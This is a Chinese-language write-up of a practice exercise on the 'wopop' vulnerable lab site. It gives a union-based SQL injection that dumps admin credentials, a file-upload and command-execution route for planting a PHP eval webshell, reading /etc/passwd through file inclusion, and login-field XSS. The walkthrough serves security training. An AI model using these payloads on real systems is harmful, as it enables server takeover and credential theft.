当前位置: 首页 > news >正文

wopop靶场漏洞挖掘练习

一、sql注入漏洞

1.在搜索框输入-1 union select 1,2,3#

可以看到页面有回显

2.查询数据库名

-1 union select 1,2,database()#

3.通过查询admin表的数据可以进行登录后台

-1 union select 1,2,group_concat(user_name,user_pass) from admin#

二、文件上传漏洞

1.登录后台最下面有一个上传文件

2.上传一句话木马

上传并访问一句话木马

3.使用蚁剑连接

三、命令执行漏洞

1.在shell输入框输入whoami页面会执行

2.尝试写入一句话木马

echo '<?php @eval($_POST[cmd]); ?>' > cc.php

3.访问cc.php

可以访问成功

四、文件包含漏洞

1.在关于界面可以看到url里使用file进行传参

尝试能不能访问其他文件

可以访问到/etc/passwd文件 说明存在文件包含漏洞

五、XSS漏洞

在登录页面的username处输入弹窗代码

发现可以出现弹窗 说明存在xss漏洞


http://www.mrgr.cn/news/26289.html

相关文章:

  • AV1 Bitstream Decoding Process Specification--[4]:语法结构
  • 英文软件汉化中文软件教程asi exe dll 等汉化教程
  • PyTorch安装指南:轻松上手深度学习框架(CUDA)
  • ORCA-3D避障算法解析
  • Python3获取mysql慢sql日志内容并飞书预警
  • 2024数学建模国赛官方评阅标准发布!
  • Linux开发工具的使用
  • 基于SpringBoot+Vue+MySQL的画师约稿平台系统
  • 实际案例(7)你遇到这样的环境,如何解决?(这是一道讨论题)
  • Oozie
  • 多语言文本检测系统源码分享
  • Linux下编译Kratos
  • GitHub每日最火火火项目(9.13)
  • SpringBoot开发——整合SSL证书启用HTTPS协议
  • [Linux#49][UDP] 2w字详解 | socketaddr | 常用API | 实操:实现简易Udp传输
  • 前后端分离项目实现SSE
  • 01_Python基本语法
  • 基于中心点的目标检测方法CenterNet—CVPR2019
  • 快速入门编写一个Java程序
  • Unreal游戏初始化流程